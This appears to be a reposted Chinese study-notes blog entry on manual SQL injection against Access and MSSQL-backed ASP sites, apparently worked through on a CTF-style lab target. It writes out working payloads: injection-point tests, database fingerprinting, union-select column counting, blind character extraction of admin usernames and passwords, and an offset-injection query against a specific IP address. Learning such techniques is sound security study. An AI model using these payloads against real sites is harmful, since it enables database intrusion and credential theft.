码迷,mamicode.com
首页 > 数据库 > 详细

学习笔记五-sql之access和mssql注入

时间:2015-11-02 18:54:24      阅读:326      评论:0      收藏:0      [点我收藏+]

标签:

1,access数据库的介绍
关系数据库管理系统,微软的小型数据库
优势:提高速度,减少代码量,避免使用过程调用
缺陷:数据过大,性能下降,数据库刷写导致问题,安全不行   
后缀名为*.mdb
打开工具:辅臣,破障
搭建平台:小旋风aspweb工具
2,access数据库调用分析
asp网站,(id=)参数传递,看到参数,看查询语句,使用破障分析数据
代码审计看是否有过滤
3,access注入原
首先判断是否存在注入点
‘    ,and 1=1,and 1=2,
如果前面的过滤掉了,用后面的判断,or 1=1,or 1=2 ,and 1=23,
或者在id值后加上负号
判断数据库类型,在id=后面加上下面的语句判断,有的时候可能没有权限
and exists (select * from msysobjects)>0(access特有的判断)
and exists (select * from sysobjects)>0(sqlserver特有的判断)
判断数据库有什么样的表和字段
and  exists (select * from admin)成功访问则证明有amdin表
and exists (select admin from admin)成功字段中有admin字段
判断字段的长度
order by 10正常11不正常,则 字段长度为10
and 1=2 union select 1,2,3,4,5,6,7,8,9,10(在火狐我们可以自动生成)
爆出来在3和5的字数
判断用户名和密码
and (select len(admin) from admin)>5 判断用户名的长度,同理判断密码
此时我们在对应的数字上写上admin,password得到账户和密码
判断密码和用户名asscii
and (select top 1 asc(mid(admin,1,1)) from admin)>0一个个判断同理的
用啊D 工具一样的性质
4,access注入工具
明小子,穿山甲,啊D,萝卜头

偏移注入
解决表名有了,但是没有列名
知道字段长度之后,我们直接用*来代替,挨个删除数字,成功位置,爆出来的东西比较随机技术分享
技术分享
偏移注入另外一种方法
找登陆界面,审查元素,看登陆名和账号,查看信息以及字段名称

实例:已知该网站是access注入
技术分享
判断字段是12
技术分享
技术分享
Sqlmap跑出来了admin表, 联合查询是5和7
技术分享
能找到id,倒是找不到admin和pass,明显的access注入
技术分享
找到偏移点
技术分享技术分享
所以说
12-8=4
4*2=8
12-8=4
所有有两个参数,有四个字段值
http://218.245.4.113:8888/web03/ca55022fa7ae5c29d179041883fe1556/index.asp?id=886  and 1=1 union select 1,2,3,4,* from (admin as a inner join admin as b on a.id=b.id) 
技术分享
结果拿到,看题目提交答案 


access垮裤查询
技术分享




1,mssql数据库介绍
微软开发的比较大的数据库,相比比较完善,比较新的是SQL server2012
mssql服务,端口,默认是1433
service.msc查看服务的
mssql安装百度很多
打开数据库,右击左侧的数据库--新建数据库弹窗--输入名称--添加确定
文件后缀名lazy.mdf
删除数据库,右击--任务--分离--全选--确定--在进入盘符删除两个文件
查询语句与上面的access一样具体的可以去网上查找
sa权限:数据库操作,文件管理,命令执行,注册表读取,system,权限交大
db权限:文件管理,数据库操作等,普通用户
public权限:来宾用户

2,mssql数据调用分析
技术分享
3,mssql注入语句
技术分享
下面进行手工测试网站爆库,在这里就不说了。




学习笔记五-sql之access和mssql注入

标签:

原文地址:http://www.cnblogs.com/lazy0/p/4930864.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!